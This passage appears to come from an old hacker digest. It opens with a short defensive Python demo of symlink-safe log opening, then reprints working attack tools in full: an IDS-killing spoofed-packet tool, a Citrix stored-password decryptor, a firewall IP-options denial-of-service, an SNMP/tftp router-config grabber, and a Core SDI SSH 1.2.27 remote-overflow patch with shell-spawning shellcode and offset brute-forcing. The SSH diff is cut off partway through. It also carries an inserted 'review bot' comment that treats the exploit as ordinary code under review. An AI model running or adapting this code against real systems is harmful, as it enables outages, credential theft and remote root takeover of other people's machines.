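The tftpd log bug above and the SSH 1.2.27 agent-socket bug in the previous item are the same class: a root process creates a file at a predictable /tmp path and follows a symlink that is already there. The Python below is an added example, not code from either script or vendor; it contrasts a link-following open with one that uses O_EXCL/O_NOFOLLOW plus an fstat check, inside a temporary directory, and the function names and the `rhosts-standin` file are assumptions.

```python
import os
import stat
import tempfile


def naive_log_open(path):
    """What a careless daemon does: open() resolves a symlink planted at path."""
    return os.open(path, os.O_WRONLY | os.O_CREAT | os.O_TRUNC, 0o644)


def safe_log_open(path):
    """Open a log file without ever following a symlink at the final component."""
    try:
        # O_CREAT|O_EXCL fails if anything, even a dangling symlink, is there.
        return os.open(path,
                       os.O_WRONLY | os.O_CREAT | os.O_EXCL | os.O_NOFOLLOW,
                       0o600)
    except FileExistsError:
        pass
    # Something already exists: O_NOFOLLOW makes the open fail on a symlink,
    # O_NONBLOCK keeps a planted FIFO from stalling the daemon.
    fd = os.open(path,
                 os.O_WRONLY | os.O_APPEND | os.O_NOFOLLOW | os.O_NONBLOCK)
    st = os.fstat(fd)
    # Accept only our own regular file with no extra hard links.
    if (not stat.S_ISREG(st.st_mode) or st.st_uid != os.geteuid()
            or st.st_nlink != 1):
        os.close(fd)
        raise PermissionError(f"refusing to log to {path}")
    return fd


def demo():
    """Run both openers against a pre-planted link; return what happened."""
    results = {}
    with tempfile.TemporaryDirectory() as tmp:
        victim = os.path.join(tmp, "rhosts-standin")       # stands in for /.rhosts
        log = os.path.join(tmp, "tftpd_xfer_status.log")   # log name from the page
        for name, opener in (("naive", naive_log_open), ("safe", safe_log_open)):
            with open(victim, "w") as fh:
                fh.write("original\n")
            if os.path.lexists(log):
                os.unlink(log)
            os.symlink(victim, log)     # the link exists before the daemon logs
            try:
                fd = opener(log)
                os.write(fd, b"transfer status\n")
                os.close(fd)
                refused = False
            except OSError:
                refused = True
            with open(victim) as fh:
                results[name] = (refused, fh.read())
        # With no link in place the safe opener creates, then reuses, the file.
        os.unlink(log)
        for _ in range(2):
            fd = safe_log_open(log)
            os.write(fd, b"entry\n")
            os.close(fd)
        with open(log) as fh:
            results["clean"] = fh.read()
    return results


if __name__ == "__main__":
    for case, outcome in demo().items():
        print(case, outcome)
```

Keeping such files in a directory that only the daemon can write to removes the problem at its source.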
@HWA
235.0 [IND] ascend router remote dos exploit by rfp.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
rfp@wiretrip.net
http://www.hack.co.za/os/routers/axent/RFProwl.c
/* RFProwl.c - rain forest puppy / wiretrip / rfp@wiretrip.net
Kills NetProwler IDS version 3.0
You need libnet installed. It's available from
www.packetfactory.net. Acks to route.
Only tested on RH 6.x Linux. To compile:
gcc RFProwl.c -lnet -o RFProwl
Plus, make sure your architecture is defined below:
Axent NetProwler 3.0
*/
#define LIBNET_LIL_ENDIAN 1
#undef LIBNET_BIG_ENDIAN 1
#include <libnet.h>
/* it's just much easier to code in the packet frags we want. :) */
char pack1[]="\x45\x00"
"\x00\x24\x08\xb9\x00\x03\x3e\x06\x96\xf8\x0a\x09\x65\x0d\x0a\x09"
"\x64\x01\x04\x02\x08\x0a\x00\x26\xcd\x35\x00\x00\x00\x00\x01\x02"
"\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00";
char pack2[]="\x45\x00"
"\x00\x2c\x08\xbf\x20\x00\x3e\x06\x76\xed\x0a\x09\x65\x0d\x0a\x09"
"\x64\x01\x04\x08\x00\x15\xa7\xe4\x00\x48\x00\x00\x00\x00\xa0\x02"
"\x7d\x78\x72\x9d\x00\x00\x02\x04\x05\xb4\x00\x00";
int main(int argc, char **argv) {
int sock, c;
u_long src_ip, dst_ip;
printf("RFProwl - rain forest puppy / wiretrip\n");
if(argc<3){
printf("Usage: RFProwl <profiled IP/destination> <src IP(fake)>\n");
exit(EXIT_FAILURE);}
dst_ip=inet_addr(argv[1]);
src_ip=inet_addr(argv[2]);
memcpy(pack1+16,&dst_ip,4);
memcpy(pack2+16,&dst_ip,4);
memcpy(pack1+12,&src_ip,4);
memcpy(pack1+12,&src_ip,4);
sock = open_raw_sock(IPPROTO_RAW);
if (sock == -1){
perror("Socket problems: ");
exit(EXIT_FAILURE);}
c = write_ip(sock, pack1, 46);
if (c < 46) printf("Write_ip #1 choked\n");
c = write_ip(sock, pack2, 46);
if (c < 46) printf("Write_ip #2 choked\n");
printf("Packets sent\n");
return (c == -1 ? EXIT_FAILURE : EXIT_SUCCESS);
}
/* www.hack.co.za [23 May]*/
@HWA
236.0 [IND] citrix router local exploit by dug song.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://www.hack.co.za/os/routers/citrix/icadecrypt.c
http://www.monkey.org/%7Edugsong/
/*
icadecrypt.c
Decrypt stored Citrix ICA passwords (in appsrv.ini).
vulnerable Citrix MetaFrame for Unix 1.0
- Sun Solaris 8.0
- Sun Solaris 7.0
Citrix MetaFrame for Windows 2000 1.8 and previous
- Microsoft Windows NT 2000
Citrix MetaFrame for Windows NT 4.0 TSE 1.8 and previous
- Microsoft Windows NT Terminal Server
+ Microsoft Windows NT 4.0
Citrix WinFrame for Windows NT 3.5 1.8
- Microsoft Windows NT 3.5.1
Dug Song <dugsong@monkey.org>
*/
#include <sys/types.h>
#include <netinet/in.h>
#include <stdio.h>
#include <string.h>
#include <ctype.h>
int
hex_decode(char *src, u_char *dst, int outsize)
{
char *p, *pe;
u_char *q, *qe, ch, cl;
pe = src + strlen(src);
qe = dst + outsize;
for (p = src, q = dst; p < pe && q < qe && isxdigit((int)*p); p += 2) {
ch = tolower(p[0]);
cl = tolower(p[1]);
if ((ch >= '0') && (ch <= '9')) ch -= '0';
else if ((ch >= 'a') && (ch <= 'f')) ch -= 'a' - 10;
else return (-1);
if ((cl >= '0') && (cl <= '9')) cl -= '0';
else if ((cl >= 'a') && (cl <= 'f')) cl -= 'a' - 10;
else return (-1);
*q++ = (ch << 4) | cl;
}
return (q - dst);
}
int
ica_decrypt(u_char *pass, int len)
{
u_short i;
u_char *p, key;
if (len < 4)
return (0);
i = ntohs(*(u_short *)pass);
if (i != len - 2)
return (0);
key = pass[2];
p = pass + 3;
for (i -= 2; i > 0; i--)
p[i] = p[i - 1] ^ p[i] ^ key;
p[0] ^= (key | 'C');
i = len - 3;
memmove(pass, pass + 3, i);
pass[i] = '\0';
return (1);
}
void
usage(void)
{
fprintf(stderr, "Usage: icadecrypt <file>\n");
exit(1);
}
int
main(int argc, char *argv[])
{
FILE *f;
u_char line[1024], pass[128];
int len;
if (argc != 2 || *argv[1] == '-')
usage();
if ((f = fopen(argv[1], "r")) == NULL) {
perror("fopen");
exit(1);
}
while (fgets(line, sizeof(line), f) != NULL) {
if (strncmp(line, "Password=", 9) == 0) {
len = hex_decode(line + 9, pass, sizeof(pass));
if (ica_decrypt(pass, len))
printf("; icadecrypt: [%s]\n", pass);
}
printf("%s", line);
}
fclose(f);
exit(0);
}
/* 5000. */
/* www.hack.co.za [23 May]*/
@HWA
237.0 [IND] ascend router remote dos attack by msg.net.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://www.hack.co.za/os/routers/axent/raptor.c
/*
* 10.26.1999
* Axent Raptor 6.0 'IP Options DOS' as documented in BugTraq 10.20.1999
*
* Proof of Concept by MSG.Net, Inc.
*
* Tested on Intel/*BSD systems, your mileage may vary. No warranty.
* Free to distribute as long as these comments remain intact.
*
* Exercises the IP options bug reported in Raptor 6.0, this bug is fixed by
* an Axent official patch available at:
*
* ftp://ftp.raptor.com/patches/V6.0/6.02Patch/
*
*
* The MSG.Net Firewall Wrecking Crew
*
* [kadokev, l^3, strange, vn]
*
* Quid custodiet ipsos custodes?
*/
#define __FAVOR_BSD
#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netinet/in_systm.h>
#include <netinet/ip.h>
#include <netinet/tcp.h>
#include <arpa/inet.h>
#define SRC_IP htonl(0x0a000001) /* 10.00.00.01 */
#define TCP_SZ 20
#define IP_SZ 20
#define PAYLOAD_LEN 32
#define OPTSIZE 4
#define LEN (IP_SZ + TCP_SZ + PAYLOAD_LEN + OPTSIZE)
void main(int argc, char *argv[])
{
int checksum(unsigned short *, int);
int raw_socket(void);
int write_raw(int, unsigned char *, int);
unsigned long option = htonl(0x44000001); /* Timestamp, NOP, END */
unsigned char *p;
int s, c;
struct ip *ip;
struct tcphdr *tcp;
if (argc != 2) {
printf("Quid custodiet ipsos custodes?\n");
printf("Usage: %s <destination IP>\n", argv[0]);
return;
}
p = malloc(1500);
memset(p, 0x00, 1500);
if ((s = raw_socket()) < 0)
return perror("socket");
ip = (struct ip *) p;
ip->ip_v = 0x4;
ip->ip_hl = 0x5 + (OPTSIZE / 4);
ip->ip_tos = 0x32;
ip->ip_len = htons(LEN);
ip->ip_id = htons(0xbeef);
ip->ip_off = 0x0;
ip->ip_ttl = 0xff;
ip->ip_p = IPPROTO_TCP;
ip->ip_sum = 0;
ip->ip_src.s_addr = SRC_IP;
ip->ip_dst.s_addr = inet_addr(argv[1]);
/* Masquerade the packet as part of a legitimate answer */
tcp = (struct tcphdr *) (p + IP_SZ + OPTSIZE);
tcp->th_sport = htons(80);
tcp->th_dport = 0xbeef;
tcp->th_seq = 0x12345678;
tcp->th_ack = 0x87654321;
tcp->th_off = 5;
tcp->th_flags = TH_ACK | TH_PUSH;
tcp->th_win = htons(8192);
tcp->th_sum = 0;
/* Set the IP options */
memcpy((void *) (p + IP_SZ), (void *) &option, OPTSIZE);
c = checksum((unsigned short *) &(ip->ip_src), 8)
+ checksum((unsigned short *) tcp, TCP_SZ + PAYLOAD_LEN)
+ ntohs(IPPROTO_TCP + TCP_SZ);
while (c >> 16) c = (c & 0xffff) + (c >> 16);
tcp->th_sum = ~c;
printf("Sending %s -> ", inet_ntoa(ip->ip_src));
printf("%s\n", inet_ntoa(ip->ip_dst));
if (write_raw(s, p, LEN) != LEN)
perror("sendto");
}
int write_raw(int s, unsigned char *p, int len)
{
struct ip *ip = (struct ip *) p;
struct tcphdr *tcp;
struct sockaddr_in sin;
tcp = (struct tcphdr *) (ip + ip->ip_hl * 4);
memset(&sin, 0x00, sizeof(sin));
sin.sin_family = AF_INET;
sin.sin_addr.s_addr = ip->ip_dst.s_addr;
sin.sin_port = tcp->th_sport;
return (sendto(s, p, len, 0, (struct sockaddr *) &sin,
sizeof(struct sockaddr_in)));
}
int raw_socket(void)
{
int s, o = 1;
if ((s = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0)
return -1;
if (setsockopt(s, IPPROTO_IP, IP_HDRINCL, (void *) &o, sizeof(o)) < 0)
return (-1);
return (s);
}
int checksum(unsigned short *c, int len)
{
int sum = 0;
int left = len;
while (left > 1) {
sum += *c++;
left -= 2;
}
if (left)
sum += *c & 0xff;
return (sum);
}
/*###EOF####*/
/* www.hack.co.za [24 May]*/
@HWA
238.0 [IND] cisco/ascend router remote exploit. posted by mixter.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://www.hack.co.za/os/routers/cisco/grabrtrconf.sh
#!/bin/sh
# grabrtrconf:
# Pull router configs via tftp for cisco's and ascends. obviously trivial to
# modify this for other network hardware that supports this type of thing.
#
# - [type] can be one of cisco | ascend currently
# - defaults to cisco
# - requires cmu snmp utilities (snmpset specifically)
# - use TFTPLISTEN and disable tftp from /etc/inetd.conf if you want to
# launch a 'temporary' in.tftpd just to grab the file.
# - 'pidof' only exists on linux that I know of which kindof makes this a
# linux-only tool, unless/until I decide to stop relying on it.
# - Set 'INT' to whatever your routable IP is.
# - run as root (if you want to launch the tftp server)
#
# - I know this is lame... but it works (most of the time).
#
# by: Eric Monti 11/1997
#
TFTPLISTEN="true"
DIR=/tftpboot #might want to use something else
WAIT=6
INT=ppp0
test "$4" = "" && echo "Usage: `basename $0` target write-community tftphost filename [type]" && exit 1
TYPE=$5
test "$5" = "" && TYPE="cisco"
IPADDR=$3
test "$IPADDR" = "." && IPADDR=`/sbin/ifconfig $INT | grep inet | sed "s/\:/\ /" | awk '{print $3}'`
echo $3
if [ -n $TFTPLISTEN ];then
echo "tftp dgram udp wait root /usr/sbin/in.tftpd in.tftpd $DIR" > /tmp/ind.conf
/usr/sbin/inetd -d /tmp/ind.conf &
rm /tmp/ind.conf
rm -f $DIR/$4
touch $DIR/$4
chmod 666 $DIR/$4
fi
#CISCO get config
test "$TYPE" = "cisco" && \
snmpset -r 3 -t 3 $1 $2 .1.3.6.1.4.1.9.2.1.55.$IPADDR s $4
#ASCEND get config
if [ "$TYPE" = "ascend" ];then
snmpset -r 3 -t 3 $1 $2 .1.3.6.1.4.1.529.9.5.3.0 a $IPADDR
snmpset -r 3 -t 3 $1 $2 .1.3.6.1.4.1.529.9.5.4.0 s $4
snmpset -r 3 $1 $2 .1.3.6.1.4.1.529.9.5.1.0 i 3
snmpset -r 3 $1 $2 .1.3.6.1.4.1.529.9.5.3.0 a "0.0.0.0"
snmpset -r 3 $1 $2 .1.3.6.1.4.1.529.9.5.4.0 s ""
fi
sleep $WAIT
# i got lazy and used pidof... so what.
# I made pretty dots appear to make up for it!
if (test `pidof in.tftpd`);then
echo Receiving file:
while (test "`pidof in.tftpd`");do
echo -n .
sleep 1
done
echo
echo Transfer Complete
fi
if [ -n $TFTPLISTEN ];then
kill `cat /var/run/inetd.pid` # jeepers, i hope that wasnt the real1
fi
# www.hack.co.za [23 May]#
@HWA
239.0 [IND] remote ssh 1.2.27 remote overflow by Core SDI SA.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://www.hack.co.za/daem0n/ssh/sshd-rsaref2.diff
diff -N -c ssh-1.2.27/README.coresdi ssh-1.2.27-exploit/README.coresdi
*** ssh-1.2.27/README.coresdi Wed Dec 31 21:00:00 1969
--- ssh-1.2.27-exploit/README.coresdi Tue Dec 14 19:21:10 1999
***************
*** 0 ****
--- 1,32 ----
+ /*
+ *
+ * Descrition: Exploit code for SSH-1.2.27 sshd with rsaref2 compiled in
+ * (--with-rsaref)
+ *
+ * Author: Alberto Solino <Alberto_Solino@core-sdi.com>
+ *
+ * Copyright (c) 1999 CORE SDI S.A., Buenos Aires, Argentina.
+ * All rights reserved.
+ *
+ *
+ * THIS SOFTWARE IS PROVIDED ``AS IS'' AND ANY EXPRESS OR IMPLIED WARRANTIES
+ * ARE DISCLAIMED. IN NO EVENT SHALL CORE SDI S.A. BE LIABLE FOR ANY DIRECT,
+ * INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY OR CONSEQUENTIAL DAMAGES RESULTING
+ * FROM THE USE OR MISUSE OF THIS SOFTWARE.
+ *
+ */
+
+ Tested on
+ SSH-1.2.27 Linux RedHat 6.0
+ SSh-1.2.27 OpenBSD 2.6
+
+ Details
+ Relies on offsets taken from JUMP_TO_MY_KEY that are different on
+ different boxes.
+ If it doesnt work, check inside incoming.buf for the string "BETO"
+ and find the proper offsets from there.
+ Additionally, the -f nad -t options are available, to provide
+ a range of addresses and try to brute force remotely the right
+ one.
+ Specify the target os type with -o
+
Binary files ssh-1.2.27/exploit_key and ssh-1.2.27-exploit/exploit_key differ
diff -N -c ssh-1.2.27/exploit_key.pub ssh-1.2.27-exploit/exploit_key.pub
*** ssh-1.2.27/exploit_key.pub Wed Dec 31 21:00:00 1969
--- ssh-1.2.27-exploit/exploit_key.pub Tue Nov 30 01:14:10 1999
***************
*** 0 ****
--- 1 ----
+ 1024 35 126711790959034717449904354103174105464423905750911738400315407900752946071988773532672356922306687685191424606806952947660867911760697942514594956213990584856991678398353026692681430136274853402829183803383791361598788187120276305630837366787507026341329913385926890796258293060370046555624537870005279144741 root@jack
Common subdirectories: ssh-1.2.27/gmp-2.0.2-ssh-2 and ssh-1.2.27-exploit/gmp-2.0.2-ssh-2
diff -N -c ssh-1.2.27/history ssh-1.2.27-exploit/history
*** ssh-1.2.27/history Wed Dec 31 21:00:00 1969
--- ssh-1.2.27-exploit/history Tue Nov 16 21:41:36 1999
***************
*** 0 ****
--- 1,7 ----
+ Tue Nov 16 19:58:04 ART 1999
+ En RSAPrivateBlock, no calcula la longitud de salida del buffer, simplemente copia
+ el tamanio del modulo que esta en privatekey, pero la longitud de los numeros
+ nunca es mayor que 128.
+ Tue Nov 16 21:41:15 ART 1999
+ overflow en RSAPrivateDecrypt????!?!?!??!?!?! who knows!! fijarse...
+
Common subdirectories: ssh-1.2.27/rsaref2 and ssh-1.2.27-exploit/rsaref2
diff -N -c ssh-1.2.27/ssh.c ssh-1.2.27-exploit/ssh.c
*** ssh-1.2.27/ssh.c Wed May 12 08:19:28 1999
--- ssh-1.2.27-exploit/ssh.c Tue Dec 14 19:03:59 1999
***************
*** 202,208 ****
#include "readconf.h"
#include "userfile.h"
#include "emulate.h"
-
#ifdef LIBWRAP
#include <tcpd.h>
#include <syslog.h>
--- 202,207 ----
***************
*** 212,217 ****
--- 211,249 ----
int allow_severity = LOG_INFO;
int deny_severity = LOG_WARNING;
#endif /* LIBWRAP */
+ #ifdef SSH_EXPLOIT
+ #define BETO_STR 0x80850f8
+ unsigned long exp_offset=BETO_STR;
+ unsigned long exp_offset_to=BETO_STR;
+ unsigned char *shell_code;
+ unsigned long shell_code_len=0;
+ unsigned char linux_shell_code[]=
+ {0x90 ,0x90 ,0x90 ,0x90 ,0x90 ,0x90 ,0x90 ,0x90
+ ,0xeb ,0x44 ,0x5e ,0x89 ,0x76
+ ,0x08 ,0x31 ,0xc0 ,0x88 ,0x46 ,0x07 ,0x89 ,0x46
+ ,0x0c ,0x56 ,0xb9 ,0x00 ,0x00 ,0x00 ,0x00 ,0xbb
+ ,0x05 ,0x00 ,0x00 ,0x00 ,0xb0 ,0x3f ,0xcd ,0x80
+ ,0xb9 ,0x01 ,0x00 ,0x00 ,0x00 ,0xbb ,0x05 ,0x00
+ ,0x00 ,0x00 ,0xb0 ,0x3f ,0xcd ,0x80 ,0xb9 ,0x02
+ ,0x00 ,0x00 ,0x00 ,0xbb ,0x05 ,0x00 ,0x00 ,0x00
+ ,0xb0 ,0x3f ,0xcd ,0x80 ,0x5e ,0xb0 ,0x0b ,0x89
+ ,0xf3 ,0x8d ,0x4e ,0x08 ,0x8d ,0x56 ,0x0c ,0xcd
+ ,0x80 ,0xe8 ,0xb7 ,0xff ,0xff ,0xff ,0x2f ,0x62
+ ,0x69 ,0x6e ,0x2f ,0x73 ,0x68 ,0x00};
+ unsigned char bsd_shell_code[]=
+ {0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
+ 0xeb, 0x45, 0x5e, 0x89, 0x76, 0x08, 0x31, 0xc0,
+ 0x88, 0x46, 0x07, 0x89, 0x46, 0x0c, 0x6a, 0x00,
+ 0x6a, 0x05, 0x51, 0xb8, 0x5a, 0x00, 0x00, 0x00,
+ 0xcd, 0x80, 0x6a, 0x01, 0x6a, 0x05, 0x51, 0xb8,
+ 0x5a, 0x00, 0x00, 0x00, 0xcd, 0x80, 0x6a, 0x02,
+ 0x6a, 0x05, 0x51, 0xb8, 0x5a, 0x00, 0x00, 0x00,
+ 0xcd, 0x80, 0x6a, 0x00, 0x8d, 0x46, 0x08, 0x50,
+ 0x8b, 0x46, 0x08, 0x50, 0xb8, 0x3b, 0x00, 0x00,
+ 0x00, 0x31, 0xc9, 0x41, 0x51, 0xcd, 0x80, 0xe8,
+ 0xb6, 0xff, 0xff, 0xff, 0x2f, 0x62, 0x69, 0x6e,
+ 0x2f, 0x73, 0x68, 0x00};
+ #endif
/* Random number generator state. This is initialized in ssh_login, and
left initialized. This is used both by the packet module and by various
***************
*** 275,280 ****
--- 307,322 ----
/* Prints a help message to the user. This function never returns. */
void usage(void)
{
+ #ifdef SSH_EXPLOIT
+ fprintf(stderr, "ssh/rsaref2 exploit by Core SDI SA (c) 1999\n");
+ fprintf(stderr, "Usage:\n\t%s [-f offset_from] [-t offset_to] -o ostype host\n",av0);
+ fprintf(stderr, "where:\n");
+ fprintf(stderr, "\toffset_from: start offset for brute force\n");
+ fprintf(stderr, "\toffset_to: end offset for brute force\n");
+ fprintf(stderr, "\tostype: remote machine ostype\n");
+ fprintf(stderr, " BSD : for (*BSD)\n");
+ fprintf(stderr, " Linux : for Intel Linuxes\n\n");
+ #else
fprintf(stderr, "Usage: %s [options] host [command]\n", av0);
fprintf(stderr, "Options:\n");
fprintf(stderr, " -l user Log in using this user name.\n");
***************
*** 321,326 ****
--- 363,369 ----
fprintf(stderr, " -C Enable compression.\n");
fprintf(stderr, " -g Allow remote hosts to connect to local port forwardings\n");
fprintf(stderr, " -o 'option' Process the option as if it was read from a configuration file.\n");
+ #endif
exit(1);
}
***************
*** 504,510 ****
--- 547,557 ----
opt = av[optind][1];
if (!opt)
usage();
+ #ifdef SSH_EXPLOIT
+ if (strchr("fto", opt)) /* options with arguments */
+ #else
if (strchr("eilcpLRo", opt)) /* options with arguments */
+ #endif
{
optarg = av[optind] + 2;
if (strcmp(optarg, "") == 0)
***************
*** 522,527 ****
--- 569,594 ----
}
switch (opt)
{
+ #ifdef SSH_EXPLOIT
+ case 'f':
+ exp_offset = strtoul(optarg,NULL,16);
+ break;
+ case 't':
+ exp_offset_to = strtoul(optarg,NULL,16);
+ break;
+ case 'o':
+ if ( !strcmp(optarg,"BSD") ) {
+ shell_code = bsd_shell_code;
+ shell_code_len = sizeof(bsd_shell_code);
+ }
+ else if ( !strcmp(optarg,"Linux") ) {
+ shell_code = linux_shell_code;
+ shell_code_len = sizeof(linux_shell_code);
+ }
+ else
+ usage();
+ break;
+ #else
case 'n':
stdin_null_flag = 1;
break;
***************
*** 681,692 ****
case 'g':
options.gateway_ports = 1;
break;
!
default:
usage();
}
}
!
/* Check that we got a host name. */
if (!host)
usage();
--- 748,766 ----
case 'g':
options.gateway_ports = 1;
break;
! #endif
default:
usage();
}
}
! #ifdef SSH_EXPLOIT
! if ( shell_code == NULL )
! usage();
! if ( exp_offset_to < exp_offset ) {
! fprintf(stderr,"Invalid offsets!\n");
! usage();
! }
! #endif
/* Check that we got a host name. */
if (!host)
usage();
***************
*** 793,798 ****
--- 867,876 ----
rhosts_authentication is true. Note that the random_state is not
yet used by this call, although a pointer to it is stored, and thus it
need not be initialized. */
+ #ifdef SSH_EXPLOIT
+ do
+ {
+ #endif
ok = ssh_connect(host, options.port, options.connection_attempts,
!use_privileged_port,
original_real_uid, options.proxy_command, &random_state);
***************
*** 846,857 ****
original_real_uid);
options.user_hostfile = tilde_expand_filename(options.user_hostfile,
original_real_uid);
!
/* Log into the remote system. This never returns if the login fails.
Note: this initializes the random state, and leaves it initialized. */
ssh_login(&random_state, host_private_key_loaded, &host_private_key,
host, &options, original_real_uid);
!
/* We no longer need the host private key. Clear it now. */
if (host_private_key_loaded)
rsa_clear_private_key(&host_private_key);
--- 924,941 ----
original_real_uid);
options.user_hostfile = tilde_expand_filename(options.user_hostfile,
original_real_uid);
! #ifdef SSH_EXPLOIT
! fprintf(stdout,"Tryin'... 0x%x\n",exp_offset);
! #endif
/* Log into the remote system. This never returns if the login fails.
Note: this initializes the random state, and leaves it initialized. */
ssh_login(&random_state, host_private_key_loaded, &host_private_key,
host, &options, original_real_uid);
! #ifdef SSH_EXPLOIT
! exp_offset++;
! } while (exp_offset<=exp_offset_to);
! fprintf(stderr,"Didn't work ;( \n");
! #endif
/* We no longer need the host private key. Clear it now. */
if (host_private_key_loaded)
rsa_clear_private_key(&host_private_key);
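Review bot: `exp_offset` is declared `unsigned long` in the earlier ssh.c hunk but is printed here with `%x` in `fprintf(stdout,"Tryin'... 0x%x\n",exp_offset);`, a format/argument mismatch wherever long is wider than int; use `%lx`. The `do {` is opened under one `#ifdef SSH_EXPLOIT` block and closed under another while the enclosed code keeps its old indentation, so the loop extent is easy to misread; a comment on the closing brace would help.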
diff -N -c ssh-1.2.27/sshconnect.c ssh-1.2.27-exploit/sshconnect.c
*** ssh-1.2.27/sshconnect.c Wed May 12 08:19:29 1999
--- ssh-1.2.27-exploit/sshconnect.c Thu Dec 9 17:09:39 1999
***************
*** 214,220 ****
#include "mpaux.h"
#include "userfile.h"
#include "emulate.h"
-
#ifdef KERBEROS
#ifdef KRB5
#include <krb5.h>
--- 214,219 ----
***************
*** 1271,1276 ****
--- 1270,1280 ----
const char *orighost,
Options *options, uid_t original_real_uid)
{
+ #ifdef SSH_EXPLOIT
+ extern unsigned long exp_offset;
+ extern unsigned char *shell_code;
+ extern unsigned long shell_code_len;
+ #endif
int i, type, len, f;
char buf[1024], seedbuf[16];
char *password;
***************
*** 1278,1283 ****
--- 1282,1298 ----
MP_INT key;
RSAPublicKey host_key;
RSAPublicKey public_key;
+ #ifdef SSH_EXPLOIT
+ MP_INT fakekey;
+ int retval;
+ unsigned char first;
+ struct sockaddr_in sin;
+ int sin_len=sizeof(struct sockaddr_in);
+ RSAPrivateKey myfakeKey;
+ RSAPrivateKey myPrivateKey;
+ char private_key_filename[]="exploit_key";
+ fd_set rfds;
+ #endif
unsigned char session_key[SSH_SESSION_KEY_LENGTH];
const char *server_user, *local_user;
char *cp, *host;
***************
*** 1501,1506 ****
--- 1516,1522 ----
/* Generate an encryption key for the session. The key is a 256 bit
random number, interpreted as a 32-byte key, with the least significant
8 bits being the first byte of the key. */
+
for (i = 0; i < SSH_SESSION_KEY_LENGTH; i++)
session_key[i] = random_get_byte(state);
***************
*** 1519,1532 ****
else
mpz_add_ui(&key, &key, session_key[i]);
}
!
/* Encrypt the integer using the public key and host key of the server
(key with smaller modulus first). */
if (mpz_cmp(&public_key.n, &host_key.n) < 0)
{
/* Public key has smaller modulus. */
assert(host_key.bits >= public_key.bits + SSH_KEY_BITS_RESERVED);
-
rsa_public_encrypt(&key, &key, &public_key, state);
rsa_public_encrypt(&key, &key, &host_key, state);
}
--- 1535,1552 ----
else
mpz_add_ui(&key, &key, session_key[i]);
}
! #ifdef SSH_EXPLOIT
! if ( load_private_key(getuid(),private_key_filename,"",&myPrivateKey,NULL)==0) {
! fprintf(stderr,"Cannot locate private key %s\n",private_key_filename);
! exit(1);
! }
! #endif
/* Encrypt the integer using the public key and host key of the server
(key with smaller modulus first). */
if (mpz_cmp(&public_key.n, &host_key.n) < 0)
{
/* Public key has smaller modulus. */
assert(host_key.bits >= public_key.bits + SSH_KEY_BITS_RESERVED);
rsa_public_encrypt(&key, &key, &public_key, state);
rsa_public_encrypt(&key, &key, &host_key, state);
}
***************
*** 1534,1540 ****
{
/* Host key has smaller modulus (or they are equal). */
assert(public_key.bits >= host_key.bits + SSH_KEY_BITS_RESERVED);
-
rsa_public_encrypt(&key, &key, &host_key, state);
rsa_public_encrypt(&key, &key, &public_key, state);
}
--- 1554,1559 ----
***************
*** 1564,1569 ****
--- 1583,1637 ----
for (i = 0; i < 8; i++)
packet_put_char(check_bytes[i]);
+ #ifdef SSH_EXPLOIT
+ for ( i = 0 ; i < 16; i++ ) {
+ mpz_mul_2exp(&key, &key, 8);
+ mpz_add_ui(&key, &key, i+1);
+ }
+ /* Aca seto el lugar donde va a estar la clave nueva cambiada*/
+ for ( i = 0; i < 4 ; i++ ) {
+ mpz_mul_2exp(&key,&key,8);
+ mpz_add_ui(&key,&key, ((exp_offset+9) >> (i*8) & 0xff));
+ }
+
+ /* Con esto fuerzo a que el ciphertext sea mas chico que el modulo*/
+ key._mp_d[31]=0;
+ key._mp_d[32]=0;
+ key._mp_d[3]=htonl(exp_offset+0x5b);
+ /* Ret address a mi codigo */
+ //key._mp_d[3]=0x51510808; // JUMP_TO_MY_KEY+87 dado vuelta
+ /*
+ No se porque mierda ahora hay que invertilo...
+ key._mp_d[3]=JUMP_TO_MY_KEY+80;
+ */
+
+ myfakeKey.bits = 1182; /* Tamanio de la clave */
+ myfakeKey.n._mp_alloc = 33;
+ myfakeKey.n._mp_size = 32;
+ myfakeKey.n._mp_d = (unsigned long int *)(exp_offset+184);
+
+ myfakeKey.e._mp_alloc = 1;
+ myfakeKey.e._mp_size = 1;
+ myfakeKey.e._mp_d = (unsigned long int *)(exp_offset+316);
+
+ myfakeKey.d._mp_alloc = 1;
+ myfakeKey.d._mp_size = 1;
+ myfakeKey.d._mp_d = (unsigned long int *)(exp_offset+25);
+
+ myfakeKey.u._mp_alloc = 17;
+ myfakeKey.u._mp_size = 16;
+ myfakeKey.u._mp_d = (unsigned long int *)(exp_offset+460);
+
+ myfakeKey.p._mp_alloc = 17;
+ myfakeKey.p._mp_size = 16;
+ myfakeKey.p._mp_d = (unsigned long int *)(exp_offset+392);
+
+ myfakeKey.q._mp_alloc = 17;
+ myfakeKey.q._mp_size = 16;
+ myfakeKey.q._mp_d = (unsigned long int *)(exp_offset+324);
+
+ #endif
+
/* Send the encrypted encryption key. */
packet_put_mp_int(&key);
***************
*** 1571,1579 ****
--- 1639,1686 ----
packet_put_int(SSH_PROTOFLAG_SCREEN_NUMBER | SSH_PROTOFLAG_HOST_IN_FWD_OPEN);
/* Send the packet now. */
+ #ifdef SSH_EXPLOIT
+ packet_put_string("BETO",4);
+ packet_put_string((char *)&myfakeKey,sizeof(myfakeKey));
+ packet_put_string(shell_code, shell_code_len);
+ packet_put_string((char *)myPrivateKey.n._mp_d,myPrivateKey.n._mp_size*4);
+ packet_put_string((char *)myPrivateKey.e._mp_d,myPrivateKey.e._mp_size*4);
+ packet_put_string((char *)myPrivateKey.q._mp_d,myPrivateKey.q._mp_size*4);
+ packet_put_string((char *)myPrivateKey.p._mp_d,myPrivateKey.p._mp_size*4);
+ packet_put_string((char *)myPrivateKey.u._mp_d,myPrivateKey.u._mp_size*4);
+ #endif
packet_send();
